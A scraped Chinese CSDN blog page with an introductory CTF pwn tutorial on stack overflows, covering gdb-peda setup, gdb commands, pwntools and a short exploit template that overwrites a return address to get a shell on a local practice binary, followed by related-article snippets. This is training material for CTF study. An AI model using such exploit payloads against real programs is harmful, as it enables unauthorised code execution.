gdb 查看是否 栈溢出_入坑 CTF-PWN 之 栈溢出入门

最新推荐文章于 2024-06-30 18:17:50 发布
最新推荐文章于 2024-06-30 18:17:50 发布
阅读量756 收藏 1
点赞数
文章标签: gdb 查看是否 栈溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36064196/article/details/113021498
版权
这篇博客介绍了如何利用gdb-peda进行栈溢出漏洞的检测和利用,包括安装peda、常用gdb命令、pwntools库的使用,以及如何寻找和构造payload来覆盖返回地址执行自定义代码。通过实例分析了栈溢出的原理,并展示了如何在没有NX和栈 Canary保护的情况下获取shell。
摘要由CSDN通过智能技术生成

好久没看过pwn题目了,写一个入门的教程顺便复习了:

1. 安装gdb-peda

git clone https://github.com/longld/peda.git ~/peda

echo "source ~/peda/peda.py" >> ~/.gdbinit

echo "DONE! debug your program with gdb and enjoy"

2. 一些比较有用的技巧

print system

直接输出__libc_system的地址 , 用以验证信息泄露以及system地址计算的正确性

checksec 检查该二进制的一些安全选项是否打开

shellcode 直接生成shellcode

attach pid , 在利用脚本connect到socat上之后,socat会fork出一个进程,gdb attach上这个进程,即可以进行远程调试了

socat TCP4-LISTEN:12345,fork EXEC:./1 本机调试

3. pwntools

安装

git clone https://github.com/Gallopsled/pwntools

cd pwntools

python setup.py install

或者使用

pip install pwn

基本的模板

from pwn import *

context.log\_level = 'debug' #debug模式,可输出详细信息

conn = remote('127.0.0.1' , 12345) #通过socat将二进制文件运行在某个端口之后,可使用本语句建立连接,易于在本地与远程之间转换。

print str(pwnlib.util.proc.pidof('pwn')[0]) #这两条便于在gdb下迅速attach 上对应的pid

raw_input('continue')

conn.recvuntil('Welcome') #两种不同的recv

conn.recv(2048)

shellcode = p32(0x0804a028) #用于将数字变成\x28\xa0\x04\x08的形式

conn.sendline(shellcode) #向程序发送信息,使用sendline而非send是个好习惯

conn.interactive() #拿到shell之后,用此进行交互

from pwn import *

pwn=remote("127.0.0.1","12345")

payload='A'*136 + p64(0x00000000004005bd)

#pwn.recvuntil('Welcome') #两种不同的recv

pwn.sendline(payload)

pwn.interactive()

本地调试

socat tcp-listen:12345, fork EXEC:./pwn

GDB 命令

1. X 命令

o - octal

x - hexadecimal

d - decimal

u - unsigned decimal

t - binary

f - floating point

a - address

最低0.47元/天 解锁文章
NEROneru
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
gdb 查看是否 栈溢出_GDB调试之二栈溢出
weixin_29442031的博客
02-23 1378
查看是否允许的core dump文件大小。如果只是临时需要用到可以使用命令ulimit -c unlimited临时打开则发生段错误时会在当前目录下产生core文件。若是需要配置一直生效并指定core文件生成路径和一些其他的信息可以用如下命令在etc/sysctl.conf目录中添加kernel.core_pattern=/var/coredump/%t-%e-%p-%c.corekernel.c...
gdb 查看是否 栈溢出_深入栈攻击系列(1)
weixin_39674978的博客
11-30 684
函数调用约定(Linux)需要注意的是,32 位和 64 位程序有以下简单的区别 x86 函数参数在函数返回地址的上方 x64 System V AMD64 ABI (Linux、FreeBSD、macOS 等采用) 中前六个整型或指针参数依次保存在 RDI, RSI, RDX, RCX, R8 和 R9 寄存器中,如果还有更多的参数的话才会保存在栈上。 内存地址不能大于 0x00007FFFFF...
函数指针
du1232的博客
11-17 141
函数指针 指向函数的指针,存放函数的地址。 #include"stdio.h" int Add(int x, int y); { return x + y; } int main() { int arr[10] = { 1, 2, 3, 4, 5, 6, 7, 8 }; int(*p)[10] = &arr;//取出数组的地址,p就是数组指针 int(*pf)(int, int) = &Add; printf("%p\n",&Add); printf("%p\n", A
pwn基础之堆基础知识超详解
最新发布
qq_73554831的博客
06-30 865
Top chunk,在第一次malloc的时候,glibc就会将堆切成两块chunk,第一块chunk就是分配出去的chunk,剩下的空间视为top chunk,之后要是分配空间不足时将会由top chunk分配出去,它的size为表示top chunk还剩多少空间。释放一个fast chunk时,首先检查它的大小以及对应fastbin此时的第一个chunk的大小是否合法,随后它会被插入到对应fastbin的链表头,此时其fd指向上一个被free的chunk。(关于top chunk的位置)!
gdb 查看是否 栈溢出_Linux下的栈溢出案例分析-GDB调试操练
weixin_31655087的博客
01-26 493
摘要:本文主要演示linux平台下的栈溢出,首先根据理论对示例代码进行溢出攻击;结果是溢出攻击成立,但是与设想的有差别;然后采用GDB调试工具对发生的意外,进行深入的分析。测试的平台:1. ubuntu 9; gcc 4.4.1; Gdb 7.0-ubuntu2. ubuntu系统安装在virtual box 3.2.8虚拟机上;示例代码如下:#includevoid overflo...
python栈溢出_GDB调试之二栈溢出
weixin_39915820的博客
12-08 355
linux下应用程序中经常会发生段错误段错误基本上是由于访问非法内存所导致的如栈溢出、数组越界访问、malloc/free内存所引起的。在linux下发生段错误时会生成core dump核心转储文件里面记录了发生段错误时的函数调用关系。ubuntu14.04下默认发生段错误时并不产生核心转储文件需要额外的配置通过命令ulimit -c查看是否允许的core dump文件大小。如果只是临时需要用到可...
ROP;CTF-pwn 详解writeup;one_gadget使用;静态库;静态链接
CHERRY_cong的博客
05-01 1107
ropme_writeup 文章目录ropme_writeup任务描述检查保护观察栈溢出地址实现系统调用ROPgadget任务一思路open(file,O_RDWR)read(4,addr,32)write(1,addr,32)exp1.py任务一运行截图任务二思路exp2.py任务二运行截图 任务描述 本实验提供了一个带有漏洞的二进制程序(ropme),这个二进制程序将你提供的文件名作为参数传入以后就会发生一个栈缓冲区溢出。请使用ROP方法编写利用,在不需要额外操作标准输入的情况下,完成以下至少一项任务
CTF-PWN练习之执行Shellcode
ChuMeng1999的博客
01-05 1514
目录预备知识一、相关实验二、Shellcode三、执行Shellcode实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 本实验要求实验者具备如下的相关知识。 一、相关实验 本实验要求您已经认真学习和完成了《CTF PWN练习之返回地址覆盖》。 二、Shellcode Shellcode指缓冲区溢出攻击中植入进程的恶意代码,这段代码可以弹出一个消息框,也可以在目标机器上打开一个监听端口,甚至是删除目标机器上的重要文件等。 Shellcode通常需要使用汇编语言进
CTF--PWN--作业记录之栈溢出(仅做个人课程学习作业记录,可能对各位帮助不大)
weixin_43594719的博客
10-14 326
【步骤一】使用IDA打开first文件进行静态反编译,在过程中我们可以得知分析出:ESP与RET的的地址相差24h;wuwu函数入口地址为0804849B。而只需将RET修改为wuwu函数的入口地址即可在执行完haha函数后跳转到wuwu函数。 【步骤二】本次使用虚拟机进行试验,打开虚拟机后需要重新进行对共享文件夹进行挂载。 【步骤三】进入01-first文件夹,使用命令ls -al查看我们对文件夹中文档的权限,有x就是有权限,没有x就是无权限。若我们对first无权限,可使用chmod +x firs
CTF PWN简单栈溢出
2301_81031055的博客
01-25 447
(mov esp,ebp)意思是先将ebp赋给esp,此时esp与ebp位于同一个地址,可以把它们现在指向的那个地址,既可以当成栈顶又可以当成是栈底。因为填充的数据后面跟的就是栈,所以它会将栈地址顺带打印出来,接下来我们继续编写脚本。到这里,我们的第一次输入就算完成了,在第二次输入的时候就能去构造payload。(此时栈顶的内容也就是ebp的内容,也就是说现在把ebp的内容赋给了esp)在这里我们发现有system函数,我们可以利用system函数的plt表。我们会发现溢出字节较少,考虑用栈溢出解题。
栈溢出调试-gdb-例子
03-26
通过列举linux平台下的例子,并结合gdb描述了堆栈溢的过程。
gdb 查看是否 栈溢出_物联网漏洞挖掘及利用实践:mips栈溢出
weixin_39645306的博客
11-20 273
前言:本文章为物联网漏洞挖掘方向,智能设备架构又以 mips、arm 为主,因此通过本篇文章先重点讲解一下mips架构下的漏洞挖掘及漏洞利用。文章以mips栈溢出漏洞为例,通过构造ROP,传递自己构造的payload,达到在被攻击方开启telnet服务或者反弹shell,继而达到想要的目的。开启telnet服务、反弹shell信息检查没有开启NX 、PIE等保护漏洞分析ida 静态分析#...
gdb 查看是否 栈溢出_64位Linux栈溢出教程
weixin_39782355的博客
01-17 824
0x01这一系列的文章目的在于快速介绍对缓冲区溢出(在64位下linux二进制程序)弱点的利用。该系列教程适合人群为:熟悉利用32位二进制程序并想应用它们的知识来利用64位二进制程序。该教程是长期的零散笔记,整理总结成的结果。搭建环境在64位与32位linux平台下编写其二进制的利用程序区别不大,然而我们将遇到一些陷阱,学习这种技术最好的方法是实践它,因此我鼓励你跟着教程一起实践。我将在Unbun...
gdb 笔记(10)— 检查内存泄漏、堆溢出、栈溢出、全局内存溢出、释放后继续使用
wohu1104的专栏
06-07 6542
(Address Sanitizer)是一个 内存错误检测器,它可以发现很多内存相关的错误,比如内存泄漏、释放之后再次使用、堆内存溢出、栈溢出等。以下代码都使用 编译。编写一段内存泄漏的示例代码,如代码清单所示。简单地使用 和 分配一块内存,但是不释放。...
gdb 查看是否 栈溢出_【Linux】GDB查看栈信息(转)
weixin_28958485的博客
01-17 402
在调试程序的过程中,查看程序的函数调用堆栈是一项最基本的任务,几乎所有的图形调试器都支持这项特性。GDB调试器当然也支持这一特性,但是功能更加灵活和丰富。GDB将当前函数的栈帧编号为0,为外层函数的栈帧依次加1,这些编号将成为一些GDB命令的参数,以指明将要操作的是哪一个函数的栈帧。GDB还支持使用Address作为栈帧的标识符,可在栈帧编号被破坏的情况下使用。1.在栈帧之间切换GDB中有很多针对...
gdbserver+attach+定位现场设备偶现BUG
weixin_43763259的博客
10-18 753
linux 内存溢出 gdb attach,多线程中快速定位段错误位置
weixin_34260071的博客
05-01 953
参考链接:https://blog.csdn.net/u011426247/article/details/79736111在做嵌入式Linux开发的时候,程序很容易出现段错误。段错误一般是内存操作指针出错或是内存溢出等问题,有的时候系统会有一点错误提示,但有的时候就直接提示个Segmentation fault (core dumped) 。如果程序是单线程,那很好处理,编译的时候添加参数-g ...
Python Pwntool Gdb Debug
weixin_30588907的博客
06-11 364
from pwn import *context.log_level = 'debug'context.terminal = ['gnome-terminal','-x','sh','-c']if args.GDB: return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)else: return proces...
Core was generated by `./PLCXOperator'. Program terminated with signal 6, Aborted. #0 0x00007f504a0a623b in raise () from /usr/lib64/libpthread.so.0 Missing separate debuginfos, use: debuginfo-install cyrus-sasl-lib-2.1.26-20.axs7.x86_64 glibc-2.17-157.axs7.1.x86_64 keyutils-libs-1.5.8-3.axs7.x86_64 krb5-libs-1.14.1-27.axs7.x86_64 libaio-0.3.109-13.axs7.x86_64 libcom_err-1.42.9-9.axs7.x86_64 libcurl-7.29.0-35.axs7.x86_64 libgcc-4.8.5-11.axs7.1.x86_64 libidn-1.28-4.axs7.x86_64 libselinux-2.5-6.axs7.x86_64 libssh2-1.4.3-10.axs7.1.x86_64 libstdc++-4.8.5-11.axs7.1.x86_64 nspr-4.11.0-1.axs7.x86_64 nss-3.21.3-2.axs7.1.x86_64 nss-softokn-freebl-3.16.2.3-14.4.axs7.x86_64 nss-util-3.21.3-1.1.axs7.x86_64 numactl-devel-2.0.9-6.axs7.x86_64 openldap-2.4.40-13.axs7.x86_64 openssl-libs-1.0.1e-60.axs7.x86_64 pcre-8.32-15.axs7.1.x86_64 zlib-1.2.7-17.axs7.x86_64 (gdb)
06-13
具体原因需要分析核心转储文件来确定,可以使用 GDB 调试工具来分析。同时,还有一些调试信息缺失,需要安装相应的 debuginfo 包来获取更多的信息。根据提示,可以使用 debuginfo-install 命令来安装相应的包。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值